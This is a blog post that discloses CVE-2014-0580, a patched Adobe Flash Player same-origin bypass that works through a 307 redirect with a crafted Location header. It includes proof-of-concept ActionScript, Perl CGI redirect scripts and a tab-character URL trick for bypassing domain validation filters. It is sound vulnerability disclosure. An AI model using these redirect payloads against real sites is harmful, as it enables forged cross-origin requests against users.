2015年6月12日金曜日

Adobe Flash Player - Circumvent The Same-Origin Policy (CVE-2014-0580).

Flash Player limit cross domain access with arbitrary custom headers but there was a way to bypass it. I reported it October 2014 and fixed at December 2014.
I'd like to share details of CVE-2014-0580. Don’t expect too much. This vulnerability is very simple.

Flash Player prohibit cross domain access without permission by crossdomain.xml. When an attacker try to send cross domain http request with custom headers, Flash Player will confirm crossdomain.xml before sending cross domain http request. However, 307 redirect with crafted Location enable an attacker to send cross domain request before confirming crossdomain.xml.
*This scenario is almost same as CVE-2011-0059, probably.

Then, crafted Location header is like below:
HTTP/1.1 307 OK
Location: /     /www.abobe.com/
Note: this works only on chrome

"/\t/" is useful to bypass domain validation filter. You can test browser's behavior by using this test code:
javascript:location.href="/\t/www.example.com/";
Copy and Paste this script into a browser address bar or javascript console. You can see the top page of "www.example.com".


I confirmed this issue on Chrome and Safari.

Sample action script code:
var req:URLRequest = new URLRequest("./location_flash.cgi");
req.method = URLRequestMethod.POST;
var header:URLRequestHeader = new URLRequestHeader("Content-type", "haru/jetstream");
req.requestHeaders.push(header);
var header2:URLRequestHeader = new URLRequestHeader("X-Haru", "yes!");
req.requestHeaders.push(header2);
req.data = "{\"test\":1}";
var loader:URLLoader = new URLLoader();
loader.addEventListener(Event.COMPLETE, loaderCompleteHD);
loader.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHD);
loader.dataFormat = URLLoaderDataFormat.TEXT
loader.load(req);
 
Server side sample code for Chrome: location_flash.cgi
#! /usr/local/bin/perl --
print "Status:307\n";
print "Location: /\t/www.adobe.com/\n\ntest";

Server side sample code for Safari on Mac: location_flash.cgi
#! /usr/local/bin/perl --
print "Status:307\n";
print "Location: //www.adobe.com/\n\ntest"; #No need to bypass the filter :-(